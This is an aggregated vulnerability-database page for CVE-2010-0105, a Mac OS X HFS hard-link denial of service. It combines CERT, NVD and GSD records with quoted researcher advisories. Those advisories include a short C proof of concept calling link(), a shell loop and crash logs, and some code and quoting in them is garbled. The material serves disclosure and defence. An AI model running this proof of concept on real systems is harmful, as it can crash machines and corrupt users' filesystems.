CVE-2010-0105 (GCVE-0-2010-0105)

Vulnerability from cvelistv5

Published

2010-04-27 15:00

Modified

2024-08-07 00:37

Severity ?

CWE

Summary

References

URL

	Vendor	Product	Version
	n/a	n/a	Version: n/a

CERTA-2010-AVI-548

Vulnerability from certfr_avis

De nombreuses vulnérabilités ont été découvertes dans le système d'exploitation Mac OS X. Leur exploitation permet, entre autres, l'exécution de code arbitraire à distance.

Description

De multiples vulnérabilités ont été corrigées dans différents composants du système d'exploitation Mac OS X. Notamment :

AFP Server ;
AppKit ;
ATS ;
CFNetwork ;
CoreGraphics ;
CoreText ;
Directory Services ;
diskdev_cmds ;
Disk Images ;
Image Capture ;
ImageIO ;
Image RAW ;
Kernel ;
Networking ;
Password Server ;
Printing ;
QuickLook ;
QuickTime ;
Safari ;
Time Machine ;
Wiki Server ;
xar.

Cette mise à jour corrige également un grand nombre de vulnérabilités dans des logiciels inclus au système d'exploitation comme Apache, CUPS, Flash Player, gzip, MySQL, OpenLDAP, OpenSSL, PHP, python, X11.

Parmi les failles corrigées, certaines permettent l'exécution de code arbitraire à distance.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
N/A	N/A	Mac OS X Server 10.6.0 à 10.6.4.
N/A	N/A	Mac OS X 10.5.8 ;
N/A	N/A	Mac OS X 10.6.0 à 10.6.4 ;
N/A	N/A	Mac OS X Server 10.5.8 ;

References

Title

Publication Time

fkie_cve-2010-0105

Vulnerability from fkie_nvd

Published

2010-04-27 15:30

Modified

2025-04-11 00:51

Severity ?

Summary

References

URL	Tags
cret@cert.org	http://lists.apple.com/archives/security-announce/2010//Nov/msg00000.html
cret@cert.org	http://securityreason.com/achievement_securityalert/83	Exploit
cret@cert.org	http://support.apple.com/kb/HT4435
cret@cert.org	http://www.securityfocus.com/bid/39658	Exploit
cret@cert.org	http://www.securitytracker.com/id?1024723
af854a3a-2127-422b-91ae-364da2661108	http://lists.apple.com/archives/security-announce/2010//Nov/msg00000.html
af854a3a-2127-422b-91ae-364da2661108	http://securityreason.com/achievement_securityalert/83	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://support.apple.com/kb/HT4435
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/39658	Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id?1024723

Impacted products

Vendor	Product	Version
apple	mac_os_x	10.5.8
apple	mac_os_x	10.6.0
apple	mac_os_x	10.6.1
apple	mac_os_x	10.6.2
apple	mac_os_x	10.6.3
apple	mac_os_x	10.6.4

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.5.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "1335E35A-D381-4056-9E78-37BC6DF8AD98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C69DEE9-3FA5-408E-AD27-F5E7043F852A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D25D1FD3-C291-492C-83A7-0AFAFAADC98D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B565F77-C310-4B83-B098-22F9489C226C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "546EBFC8-79F0-42C2-9B9A-A76CA3F19470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:apple:mac_os_x:10.6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "119C8089-8C98-472E-9E9C-1741AA21DD35",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component."
    },
    {
      "lang": "es",
      "value": "La implementaci\u00f3n de hfs en Apple Mac OS X versi\u00f3n 10.5.8 y versi\u00f3n 10.6.x anterior a 10.6.5, admite enlaces f\u00edsicos en directorios y no impide ciertas estructuras de directorios profundamente anidadas, lo que permite a los usuarios locales causar una denegaci\u00f3n de servicio (corrupci\u00f3n del sistema de archivos) por medio de una aplicaci\u00f3n creada que llama a las funciones mkdir y link, relacionadas con el programa fsck_hfs en el componente diskdev_cmds."
    }
  ],
  "id": "CVE-2010-0105",
  "lastModified": "2025-04-11T00:51:21.963",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 4.9,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2010-04-27T15:30:01.217",
  "references": [
    {
      "source": "cret@cert.org",
      "url": "http://lists.apple.com/archives/security-announce/2010//Nov/msg00000.html"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://securityreason.com/achievement_securityalert/83"
    },
    {
      "source": "cret@cert.org",
      "url": "http://support.apple.com/kb/HT4435"
    },
    {
      "source": "cret@cert.org",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/39658"
    },
    {
      "source": "cret@cert.org",
      "url": "http://www.securitytracker.com/id?1024723"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.apple.com/archives/security-announce/2010//Nov/msg00000.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://securityreason.com/achievement_securityalert/83"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://support.apple.com/kb/HT4435"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit"
      ],
      "url": "http://www.securityfocus.com/bid/39658"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1024723"
    }
  ],
  "sourceIdentifier": "cret@cert.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

gsd-2010-0105

Vulnerability from gsd

Modified

2023-12-13 01:21

Details

Aliases

CVE-2010-0105

Aliases

CVE-2010-0105

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2010-0105",
    "description": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component.",
    "id": "GSD-2010-0105",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2010-0105"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2010-0105"
      ],
      "details": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component.",
      "id": "GSD-2010-0105",
      "modified": "2023-12-13T01:21:28.702277Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cert@cert.org",
        "ID": "CVE-2010-0105",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "1024723",
            "refsource": "SECTRACK",
            "url": "http://www.securitytracker.com/id?1024723"
          },
          {
            "name": "http://support.apple.com/kb/HT4435",
            "refsource": "CONFIRM",
            "url": "http://support.apple.com/kb/HT4435"
          },
          {
            "name": "20100423 MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability",
            "refsource": "SREASONRES",
            "url": "http://securityreason.com/achievement_securityalert/83"
          },
          {
            "name": "APPLE-SA-2010-11-10-1",
            "refsource": "APPLE",
            "url": "http://lists.apple.com/archives/security-announce/2010//Nov/msg00000.html"
          },
          {
            "name": "39658",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/39658"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.5.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:10.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cert@cert.org",
          "ID": "CVE-2010-0105"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "NVD-CWE-Other"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20100423 MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability",
              "refsource": "SREASONRES",
              "tags": [
                "Exploit"
              ],
              "url": "http://securityreason.com/achievement_securityalert/83"
            },
            {
              "name": "39658",
              "refsource": "BID",
              "tags": [
                "Exploit"
              ],
              "url": "http://www.securityfocus.com/bid/39658"
            },
            {
              "name": "APPLE-SA-2010-11-10-1",
              "refsource": "APPLE",
              "tags": [],
              "url": "http://lists.apple.com/archives/security-announce/2010//Nov/msg00000.html"
            },
            {
              "name": "http://support.apple.com/kb/HT4435",
              "refsource": "CONFIRM",
              "tags": [],
              "url": "http://support.apple.com/kb/HT4435"
            },
            {
              "name": "1024723",
              "refsource": "SECTRACK",
              "tags": [],
              "url": "http://www.securitytracker.com/id?1024723"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 6.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        }
      },
      "lastModifiedDate": "2010-12-10T05:00Z",
      "publishedDate": "2010-04-27T15:30Z"
    }
  }
}

var-201004-0093

Vulnerability from variot

The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component. Apple Mac OS X is prone to a local denial-of-service vulnerability. Exploiting this issue allows local, unprivileged users to crash affected system, denying further service to legitimate users. Apple Mac OS X 10.6.2 and 10.6.3 are affected; other versions may also be vulnerable. Apple Mac is the operating system used by the Apple family of computers. MacOSX/XNU HFS Multiple Vulnerabilities Maksymilian Arciemowicz http://cxsecurity.com/ http://cifrex.org/

===================

On November 8th, I've reported vulnerability in hard links for HFS+ (CVE-2013-6799)

http://cxsecurity.com/issue/WLB-2013110059

The HFS+ file system does not apply strict privilege rules during the creating of hard links. The ability to create hard links to directories is wrong implemented and such an issue is affecting os versions greater or equal to 10.5. Officially Apple allows you to create hard links only for your time machine. Vulnerability CVE-2013-6799 (incomplete fix for CVE-2010-0105) allow to create hard link to directory and the number of hard links may be freely high. To create N hard links, you must use a special algorithm which creates links from the top of the file system tree. This means that first we create the directory structure and once created we need to go from up to down by creating hard links. The last time I've mentioned of the possibility of a kernel crash by performing the 'ls' command. This situation occurs in conjunction with the 'find' application.

Commands such as 'ls' behave in unexpected ways. Apple are going find this crash point in code. To create huge hard links structure, use this code

http://cert.cx/stuff/l2.c

h1XSS:tysiak cx$ uname -a Darwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16 19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64 h1xss:tysiak cx$ gcc -o l2 l2.c h1xss:tysiak cx$ ./l2 1000 ... h1xss:tysiak cx$ cat loop.sh

!/bin/bash

while [ 1 ] ; do ls -laR B > /dev/null done

h1xss:tysiak cx$ sh ./loop.sh ls: B: No such file or directory ls: X1: No such file or directory ... ls: X8: Bad address ls: X1: Bad address ls: X2: Bad address ... ls: X8: No such file or directory ./loop.sh: line 4: 8816 Segmentation fault: 11 ls -laR B > /dev/null ./loop.sh: line 4: 8818 Segmentation fault: 11 ls -laR B > /dev/null ls: B: No such file or directory ls: X1: No such file or directory ls: X2: No such file or directory ... ls: X1: No such file or directory ls: X2: No such file or directory

...

Feb 9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for ls[9418] version 230 to /Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash

That what we can see here is unexpected behavior of LS command. LS process is also affected for infinite loop (recursion?).

h1xss:tysiak cx$ ps -fp 8822 UID PID PPID C STIME TTY TIME CMD 501 8822 8810 0 7:36 ttys002 62:19.65 ls -laR B

or used parallely with (find . > /dev/null) command cause a kernel crash

Mon Mar 31 20:30:41 2014 panic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838, type 13=general protection, registers: CR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c, CR4: 0x00000000001606e0 RAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000, RDX: 0x0000000000000000 RSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018, RDI: 0xffffff802f23bcd0 R8: 0xffffff8140d9bc1c, R9: 0xffffff802f26e960, R10: 0xffffff8140d9ba2c, R11: 0x0000000000000f92 R12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0, R15: 0xffffff802f26e960 RFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS: 0x0000000000000008, SS: 0x0000000000000010 Fault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU: 0x0

Backtrace (CPU 0), Frame : Return Address 0xffffff811eee8c50 : 0xffffff8004422fa9

BSD process name corresponding to current thread: ls

XNU is the computer operating system kernel that Apple Inc. acquired and developed for use in the Mac OS X operating system and released as free and open source software as part of the Darwin operating system. We can try to see HFS implementation code. Let's start static code analysys using cifrex.org tool!

-1.--------------------------------------------------------- Unchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c

Code: http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c

--- hfs_vfsops.c ---------------------------- / * HFS filesystem related variables. / int hfs_sysctl(int name, __unused u_int namelen, user_addr_t oldp, size_t oldlenp, user_addr_t newp, size_t newlen, vfs_context_t context) { ... if ((newlen <= 0) || (newlen > MAXPATHLEN)) return (EINVAL);

    bufsize = MAX(newlen * 3, MAXPATHLEN);
    MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);
    if (filename == NULL) { <=====================================

filename CHECK error = ENOMEM; goto encodinghint_exit; } MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK); if (filename == NULL) { <====================================== double CHECK? error = ENOMEM; goto encodinghint_exit; }

    error = copyin(newp, (caddr_t)filename, newlen);
    if (error == 0) {
        error = utf8_decodestr((u_int8_t *)filename, newlen - 1,

unicode_name, &bytes, bufsize, 0, UTF_DECOMPOSED); if (error == 0) { hint = hfs_pickencoding(unicode_name, bytes / 2); error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0, (int32_t *)&hint); } } --- hfs_vfsops.c----------------------------

Twice checking of 'filename' has no sense. Probably 'unicode_name' should be checked in second condition.

-2.--------------------------------------------------------- Possible Buffer Overflow in resource fork (hfs_vnops.c)

Unverified value returned by snprintf() may be bigger as a declared buffer (MAXPATHLEN).

https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html

The snprintf() and vsnprintf() functions will write at most n-1 of the characters printed into the out-put output put string (the n'th character then gets the terminating `\0'); if the return value is greater than or equal to the n argument, the string was too short and some of the printed characters were discarded. The output is always null-terminated.

Code: http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c

--- hfs_vnops.c ---------------------------- ... / * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode that is * found in 'vp'. The rsrc fork vnode is returned with the cnode locked and iocount * on the rsrc vnode. * ... /

int hfs_vgetrsrc(struct hfsmount hfsmp, struct vnode vp, struct vnode **rvpp, int can_drop_lock, int error_on_unlinked) {

...

/ * Supply hfs_getnewvnode with a component name. / cn.cn_pnbuf = NULL; if (descptr->cd_nameptr) { MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI, M_WAITOK); cn.cn_nameiop = LOOKUP; cn.cn_flags = ISLASTCN | HASBUF; cn.cn_context = NULL; cn.cn_pnlen = MAXPATHLEN; cn.cn_nameptr = cn.cn_pnbuf; cn.cn_hash = 0; cn.cn_consume = 0; cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN, <================ "%s%s", descptr->cd_nameptr, _PATH_RSRCFORKSPEC); } dvp = vnode_getparent(vp); error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? &cn : NULL, <================ descptr, GNV_WANTRSRC | GNV_SKIPLOCK, &cp->c_attr, &rsrcfork, &rvp, &newvnode_flags);

--- hfs_vnops.c ----------------------------

Pattern is '%s%s' where sum of length descptr->cd_nameptr and _PATH_RSRCFORKSPEC may be bigger as a declared buffer size (MAXPATHLEN). Size of descptr->cd_nameptr is MAXPATHLEN and value _PATH_RSRCFORKSPEC is

#define _PATH_RSRCFORKSPEC "/..namedfork/rsrc"

where length is 17 chars. Possible up to 17 chars overflow here?.

Now let's see hfs_getnewvnode function

http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c

--- hfs_cnode.c ---------------------------- hfs_getnewvnode( struct hfsmount hfsmp, struct vnode dvp, struct componentname cnp, <======== WATCH THIS struct cat_desc descp, int flags, struct cat_attr attrp, struct cat_fork forkp, struct vnode vpp, int out_flags) { ... if ((vpp != NULL) && (cnp)) { / we could be requesting the rsrc of a hardlink file... / vnode_update_identity (*vpp, dvp, cnp->cn_nameptr, cnp->cn_namelen, cnp->cn_hash, <== NAMELEN HERE (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME)); ... --- hfs_cnode.c ----------------------------

and call to vnode_update_indentity()

http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c

--- vfs_cache.c ---------------------------- void vnode_update_identity(vnode_t vp, vnode_t dvp, const char name, int name_len, uint32_t name_hashval, int flags) { ... if ( (flags & VNODE_UPDATE_NAME) ) { if (name != vp->v_name) { if (name && name) { if (name_len == 0) name_len = strlen(name); tname = vfs_addname(name, name_len, name_hashval, 0); <== NAMELEN HERE } } else flags &= ~VNODE_UPDATE_NAME; } ... const char * vfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags) { return (add_name_internal(name, len, hashval, FALSE, flags)); <== CALL

} --- vfs_cache.c ----------------------------

And invalid memory reference in add_name_internal()

--- vfs_cache.c ---------------------------- static const char * add_name_internal(const char name, uint32_t len, u_int hashval, boolean_t need_extra_ref, __unused u_int flags) { struct stringhead head; string_t entry; uint32_t chain_len = 0; uint32_t hash_index; uint32_t lock_index; char ptr;

/*
 * if the length already accounts for the null-byte, then
 * subtract one so later on we don't index past the end
 * of the string. 
 */
if (len > 0 && name[len-1] == '\0') { <===== INVALID MEMORY REFERENCE
    len--;
}
if (hashval == 0) {
    hashval = hash_string(name, len);
}

--- vfs_cache.c ----------------------------

-3.--------------------------------------------------------- Unchecked Return Value to NULL Pointer Dereference hfs_catalog.c and not only

Please pay attention that a buffer length check (stored in some variable) should be performed; also return from *alloc() function family should be verified for possible NULL pointers. Here are a few FALSE / POSITIVE examples.

http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c

--- hfs_catalog.c ---------------------------- / * builddesc - build a cnode descriptor from an HFS+ key / static int builddesc(const HFSPlusCatalogKey key, cnid_t cnid, u_int32_t hint, u_int32_t encoding, int isdir, struct cat_desc descp) { int result = 0; unsigned char * nameptr; size_t bufsize; size_t utf8len; unsigned char tmpbuff[128];

/* guess a size... */
bufsize = (3 * key->nodeName.length) + 1;
if (bufsize >= sizeof(tmpbuff) - 1) { <============================
    MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <=

MALLOC FAIL } else { nameptr = &tmpbuff[0]; }

result = utf8_encodestr(key->nodeName.unicode,
        key->nodeName.length * sizeof(UniChar),
        nameptr, (size_t *)&utf8len, <============================

... maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) / SMALL_DIRENTRY_SIZE)); bufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(iterator); if (extended) { bufsize += 2sizeof(struct direntry); } MALLOC(buffer, void , bufsize, M_TEMP, M_WAITOK); <============================ bzero(buffer, bufsize); ... FREE(nameptr, M_TEMP); MALLOC(nameptr, unsigned char , bufsize, M_TEMP, M_WAITOK); <==============

result = utf8_encodestr(key->nodeName.unicode, key->nodeName.length * sizeof(UniChar), nameptr, (size_t )&utf8len, bufsize, ':', 0); } ... cnp = (const CatalogName )&ckp->hfsPlus.nodeName; bufsize = 1 + utf8_encodelen(cnp->ustr.unicode, cnp->ustr.length * sizeof(UniChar), ':', 0); MALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); <======== result = utf8_encodestr(cnp->ustr.unicode, cnp->ustr.length * sizeof(UniChar), new_nameptr, &tmp_namelen, bufsize, ':', 0);

--- hfs_catalog.c ----------------------------

The above examples does not look nice, too. Are you among them is the crux of the problem applications and kernel crash? I informed Apple of those possible errors, it has passed more than a month and I still have not received any comment nor solution.

--- 1. References --- http://cxsecurity.com/issue/WLB-2014040027 http://cxsecurity.com/cveshow/CVE-2013-6799/ http://cxsecurity.com/cveshow/CVE-2010-0105/

--- 2. Greetz --- Kacper George and Michal

--- 3. Credit --- Maksymilian Arciemowicz http://cxsecurity.com/ http://cifrex.org/ http://cert.cx/

Best regards, CXSEC TEAM http://cxsec.org/

. Apple MacOSX 10.9 Hard Link Memory Corruption

Date: 08.11.2013 http://cxsecurity.com/ http://cvemap.org/

URL: http://cxsecurity.com/issue/WLB-2013110059

1. Description ---

In most UNIX-like systems a hard link to a directory is only reserved for the 'root' user when possible at all. In MacOSX 10.6 there was one such a vulnerability (CVE-2010-0105) causing the filesystem being resulting corrupted; the creation of many hard links was the cause. A notable exception to this is Mac OS X v10.5 (Leopard) and newer, which use hard links on directories for the Time Machine backup mechanism only.'

'Only for the Time Machine' is not True. Let's see quick PoC

A plain program performing a system call (link)

mac-cxs-XK:pochd XK$ cat test.c

include

void usage(const char program) { const char message = " [src_dir] [target_dir]"; fprintf(stderr, "%s%s\n", program, message); }

int main(int argc, char* argv[]) { if (argc!=3) { usage(argv[0]); return 1; }

int ret = link(argv[1],argv[2]);

fprintf(stderr,"link(3) return= %d\n", ret);

return ret;

}

mac-cxs-XK:pochd XK$ gcc -o test test.c mac-cxs-XK:pochd XK$ ls test test.c mac-cxs-XK:pochd XK$ mkdir DIR1 mac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1 link(3) return= -1 mac-cxs-XK:pochd XK$ mkdir DIR1/DIR2 mac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2 link(3) return= 0 mac-cxs-XK:pochd XK$ cd DIR1 mac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3 mac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3 link(3) return= 0 mac-cxs-XK:DIR1 XK$ cd DIR2 mac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4 mac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4 link(3) return= -1

Hardlink1 and Hardlink4 failed instead Hardlink2 and Hardlink3 did not; so which may be the cause? In my opinion we should recognize it as a security flaw and if Apple is not going to fix this vulnerability then someone should change the Wikipedias at least.

Operation (functionality) of hard links differs from those described in "Unix Internals: The New Frontiers" book (by Uresh Vahalia) Old unix standards simply prevent to create any hard link to whatever directory for any user (root included).

Is that new CWE-DesignError vulnerability or new UNIX style?

There may be many possible bad consequences coming out from wrong 'hard link' handling. We will not yet public full description of this problem but we do know that it exists and that it may exhaust kernel/system resources, it may cause application crashes or kernel panics. Let's wait for new MacOSX version. A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A: total 0 Process 14413 stopped * thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylibstrlen + 18, queue = 'com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290) frame #0: 0x00007fff948f7812 libsystem_c.dylibstrlen + 18 libsystem_c.dylibstrlen + 18: -> 0x7fff948f7812: pcmpeqb (%rdi), %xmm0 0x7fff948f7816: pmovmskb %xmm0, %esi 0x7fff948f781a: andq $15, %rcx 0x7fff948f781e: orq $-1, %rax (lldb) (lldb) bt * thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylibstrlen + 18, queue = 'com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290) frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18 ..

Does the kernel panic correspond to 'ls' ? More details soon. Credit --- Maksymilian Arciemowicz ( http://cert.cx/ )

Frist CVE&CWE compatible bugtraq http://cxsecurity.com/ http://cvemap.org/

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
